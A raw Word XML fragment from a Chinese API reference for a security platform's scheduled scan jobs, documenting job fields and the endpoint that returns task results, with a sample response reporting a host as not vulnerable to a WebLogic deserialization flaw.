          <w:p w14:paraId="126BDF10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>定时表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5B67B806" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A905E2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F79F40E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0494CC21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业开始时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4E16215B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350B9433" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18413016" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17DE8161" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业扫描时间(单位s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="232DBDBD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="420A85F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28C20968" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36EFA8DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业状态 1.准备执行, 2.正在执行, 3.执行成功, 4.执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CD4CFE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="397" w:name="_Toc115166271"/>
      <w:bookmarkStart w:id="398" w:name="查看执行记录结果"/>
      <w:bookmarkEnd w:id="396"/>
      <w:r>
        <w:t>查看执行记录结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="397"/>
    </w:p>
    <w:p w14:paraId="7B37CADE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266EA893" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/task/result/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskRecordId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E45E80A"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486"/>
        <w:gridCol w:w="1316"/>
        <w:gridCol w:w="5846"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="617F0A5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AE3C343" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EC6D673" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D1DF64F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6AF996B2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61BC9D0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskRecordId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE1AF5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C10C8F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务执行id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F6BE851" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04172001" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>searchKeys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06338B3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0270E0C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>searchKeys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>为field对应参数</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>名素组</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,与</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>searchValues</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>顺序对应</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03CABE83" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29BC43D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>searchValues</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36838CD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FBEBFA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>searchValues</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>为数据值, 与</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>searchKeys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>的顺序对应</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13FB6974" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>排序字段：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F095405" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E9053B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7A71DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/task/result/5d1d61c423e46813eb98f514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F056D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772FEDDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"field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field"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>host.displayIp</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displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"主机IP"</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eld"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>host.agentId</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displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"主机ID"</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eld"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>host.hostname</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displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"主机名"</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eld"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>data.ip</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displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"检测的目标主机</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="String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eld"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>data.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"检测的目标主机端口（默认为700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eld"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>data.vuln</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displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"检测结果"</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ow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ata.vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"不存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2018-2628 反序列化漏洞"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.146.131"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.hostTagList</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ca89225d8915cedfee156"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"server-4"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>tagColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"#FF00FF"</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host.assetLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>data.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
